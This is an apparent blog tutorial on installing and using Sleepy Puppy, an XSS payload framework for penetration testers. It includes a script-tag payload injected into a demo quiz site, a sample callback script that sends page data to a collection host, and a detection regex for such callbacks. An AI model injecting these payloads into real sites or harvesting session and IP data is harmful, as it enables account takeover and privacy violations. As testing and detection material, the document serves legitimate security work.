Sleepy Puppy XSS Payload Management Framework – All things in moderation

Sleepy Puppy XSS Payload Management Framework

Sleepy Puppy is an XSS Payload Management Framework that ships with a number of XSS payloads you can use. We can create new assessments, each of which gets unique payloads for identifying captures; by default every payload is associated with the “General” assessment. After you create an assessment, you can copy a payload from that assessment and inject it into the application. When the script containing the payload is loaded in that application, or later in another application (delayed), the following events occur:

The PuppyScript file(s) associated with that payload are retrieved from the server. The payload carries the u parameter, a unique identifier used to link the payload with the capture, and the a parameter, which identifies the assessment the payload belongs to. These are two important things to remember.

By default, only one PuppyScript runs; it collects metadata and a screenshot of the page where the payload fired. The server also replaces the associated variables and hostnames within the PuppyScript file. If you decide to write your own PuppyScripts, you can use the following Jinja2 template variables, which are filled in automatically when the PuppyScript is loaded:

  • {{payload}} this is a required field if your PuppyScript contains callbacks. It lets Sleepy Puppy record which payload fired before the capture.
  • {{assessment}} this is a required field if your PuppyScript contains callbacks. It lets Sleepy Puppy map the capture to the correct assessment.
  • {{hostname}}
  • {{callback_protocol}}
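To make the substitution concrete, here is an added Python example (not code from the Sleepy Puppy project) that renders a constructed PuppyScript containing those four variables and refuses a callback script that omits {{payload}} or {{assessment}}. The script body and the "/callbacks" path are assumptions for illustration only; the real project uses Jinja2, while this example uses a small regex renderer so it runs without extra dependencies.

```python
import re

# Constructed sample PuppyScript for illustration only (not one of the
# project's scripts). It posts the page location back to the server; the
# "/callbacks" path is a hypothetical placeholder, not the project's route.
SAMPLE_PUPPYSCRIPT = """
var capture = {
  payload: "{{payload}}",
  assessment: "{{assessment}}",
  location: document.location.href
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "{{ callback_protocol }}://{{ hostname }}/callbacks", true);
xhr.send(JSON.stringify(capture));
"""

# Matches {{name}} with optional surrounding whitespace, as Jinja2 would.
TEMPLATE_VAR = re.compile(r"\{\{\s*(\w+)\s*\}\}")
KNOWN_VARS = {"payload", "assessment", "hostname", "callback_protocol"}
# The post says these two are required whenever the script calls back.
REQUIRED_FOR_CALLBACKS = {"payload", "assessment"}
# Using either of these means the script talks to the server, i.e. calls back.
CALLBACK_VARS = {"hostname", "callback_protocol"}


def template_vars(script):
    """Return the set of template variable names a PuppyScript uses."""
    return set(TEMPLATE_VAR.findall(script))


def validate_puppyscript(script):
    """Reject unknown variables, and enforce that a script which calls back
    to the server also carries the two identifiers the server needs to map
    the capture to its payload and assessment. Returns the variables used."""
    used = template_vars(script)
    unknown = used - KNOWN_VARS
    if unknown:
        raise ValueError("unknown template variable(s): %s" % sorted(unknown))
    if used & CALLBACK_VARS:
        missing = REQUIRED_FOR_CALLBACKS - used
        if missing:
            raise ValueError("callback script is missing: %s" % sorted(missing))
    return used


def render_puppyscript(script, payload_id, assessment_id, hostname,
                       callback_protocol="https"):
    """Fill in the four variables the server substitutes when the script is
    loaded. Ids are coerced to str so numeric values render cleanly."""
    validate_puppyscript(script)
    values = {
        "payload": str(payload_id),
        "assessment": str(assessment_id),
        "hostname": hostname,
        "callback_protocol": callback_protocol,
    }
    return TEMPLATE_VAR.sub(lambda m: values[m.group(1)], script)


if __name__ == "__main__":
    print(render_puppyscript(SAMPLE_PUPPYSCRIPT, 1, 2, "127.0.0.1:8000", "http"))
```

The validation step is the part worth copying into your own PuppyScripts: a script that reaches the server without {{payload}} and {{assessment}} produces a capture that cannot be tied back to the payload or assessment that fired.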

Now I will show you how to install this framework:

  1. Install:
    – First we need to install Python 2.7, pip and Git. Then we clone the repository with this command:

    git clone https://github.com/sbehrens/sleepy-puppy.git

    – Setup a Virtual Environment:

    $sudo pip install virtualenv
    $cd sleepy-puppy/
    $virtualenv sleepyenv
    $source sleepyenv/bin/activate
    

    – Install the required dependencies:

    $python setup.py install
    

    – Create the database, seed it, and create the default login with the ‘admin’ user.
    We can do all of this with one command:

    $python manage.py setup_sleepy_puppy
    

    The password you enter will be used to log in to the site manager with username ‘admin’.
    The same setup can also be done one command at a time:

    $python manage.py create_db
    $python manage.py create_login admin
    $python manage.py create_bootstrap_assessment
    

    The basic installation steps have completed. Now we can test that sleepy-puppy works:
    – Source the virtual environment

    cd sleepy-puppy/
    source sleepyenv/bin/activate
    

    – Run the Flask Application

    python manage.py runserver --host 0.0.0.0 --port 8000
    

    Log in with username admin and the password entered during the installation process.

  2. How to use it:
    – After a successful login, we see this screen:
    (screenshot: login_01)
    – We can create an assessment here:
    (screenshot: login_02)
    In an assessment, “Snooze” is an option that helps when the application we are testing is being hit heavily and consuming bandwidth: while snoozed, the application stops collecting information and data, and screenshots stop.
    “Run Once” means the payload will fire only once; this proves that the application is vulnerable to XSS without going on to collect data about its users.
    – Create USER:
    (screenshot: login_03)
    We can create a USER here. It helps us manage our own assessments easily.
    Assessments: the assessments the account you create is assigned to.
    Email: the registered address; notifications and errors will be sent to that email.
    – PuppyScript tab:
    This tab contains the predefined scripts that are called back and carry out the tasks of the XSS capture, such as collecting the IP, session, screenshot and so on.
    (screenshot: login_04)
    We can also create our own scripts to perform separate tasks.
    (screenshot: login_05)
    – Payload tab:
    This tab lists the payloads used to inject into the XSS-vulnerable pages; the src of each payload is the placeholder “$S1”.
    (screenshot: login_06)
    We can create a new payload:
    (screenshot: login_07)
    For a given assessment, the ‘$S1’ will be replaced by the system with:
    src=//127.0.0.1:8000/x?u=1&a=1 where:
    127.0.0.1:8000 is the host address/domain name and the port on which the Sleepy Puppy service is listening.
    u is the id corresponding to your payload.
    a is the id of the assessment the payload belongs to (the a parameter described above).
  3. We can use this framework to test now.
    Demo with the website: http://xss-quiz.int21h.jp
    (screenshot: login_08)
    – After successfully injecting the payload:
    <script src=//127.0.0.1:8000/x?u=1&a=2></script>
    we obtain the results in the Captures tab:
    (screenshot: login_09)
    – Depending on the options of the PuppyScript, the returned capture will contain different components. If we enable logging, the system will log every time the corresponding injection fires.
    (screenshot: login_10)
    – Generic Collector:
    (screenshot: login_11)
    It contains the collected information, including the IP address.
    – Another thing: if you need the results sent to your mail automatically, you need to configure this:
    Config email:
    gedit sleepy-puppy/config-default.conf
    (screenshot: login_12)
    This post assumes you have already deployed Sleepy Puppy, have configured either SES or SMTP email, and have confirmed successful authentication to the web UI. I hope you will have fun with it.
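The Payload tab and the demo above both revolve around one URL shape: the src that replaces $S1 is //host:port/x?u=PAYLOAD_ID&a=ASSESSMENT_ID. The following added Python 3 example (not code from the Sleepy Puppy project) builds that src from a payload template and, on the defender side, scans stored page content and a web-server request line for references of the same shape so a blue team can spot an injected callback and read off which payload and assessment it belongs to. The sample content, the example hostnames and the regular expression are constructed assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qs


def build_callback_src(host, payload_id, assessment_id):
    """Build the protocol-relative src that replaces $S1, in the shape the
    post shows: //127.0.0.1:8000/x?u=1&a=1 (u = payload id, a = assessment id)."""
    return "//%s/x?u=%d&a=%d" % (host, payload_id, assessment_id)


def expand_payload(payload_template, host, payload_id, assessment_id):
    """Substitute the $S1 placeholder in a payload template with the callback src."""
    return payload_template.replace(
        "$S1", build_callback_src(host, payload_id, assessment_id))


# Defender side: a callback reference looks like [scheme:]//host/x?u=N&a=N in
# page content, or a bare "/x?u=N&a=N" in a web server request line. The host
# part is optional so that log request lines are matched too.
CALLBACK_RE = re.compile(r"""(?://([^/\s"'<>]+))?/x\?([^\s"'<>]+)""")


def find_callbacks(text):
    """Return (host, payload_id, assessment_id) for every Sleepy-Puppy-style
    callback reference in text; host is None when only the path is visible.
    HTML-escaped '&amp;' inside attributes is unescaped before parsing."""
    hits = []
    for m in CALLBACK_RE.finditer(text):
        host, query = m.group(1), html.unescape(m.group(2))
        params = parse_qs(query)
        try:
            hits.append((host, int(params["u"][0]), int(params["a"][0])))
        except (KeyError, ValueError):
            continue  # a /x? URL without both numeric ids is not a callback
    return hits


# Constructed sample: stored page content plus one access-log line.
SAMPLE_TEXT = """
<div class="comment">hello</div>
<script src=//127.0.0.1:8000/x?u=1&a=2></script>
<img src="https://puppy.example.test/x?u=7&amp;a=3">
10.0.0.5 - - [01/Jan/2016:10:00:00 +0000] "GET /x?u=1&a=2 HTTP/1.1" 200 512
<a href="/index.php?u=1&a=2">not a callback</a>
"""

if __name__ == "__main__":
    print(expand_payload("<script src=$S1></script>", "127.0.0.1:8000", 1, 2))
    for host, u, a in find_callbacks(SAMPLE_TEXT):
        print("callback host=%s payload=%d assessment=%d" % (host, u, a))
```

Run over your own stored content or access logs, the (host, u, a) tuples tell you where a Sleepy Puppy callback is being loaded from and which assessment it reports to; the last sample line shows that an unrelated URL carrying u and a parameters is ignored because the /x? path is absent.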
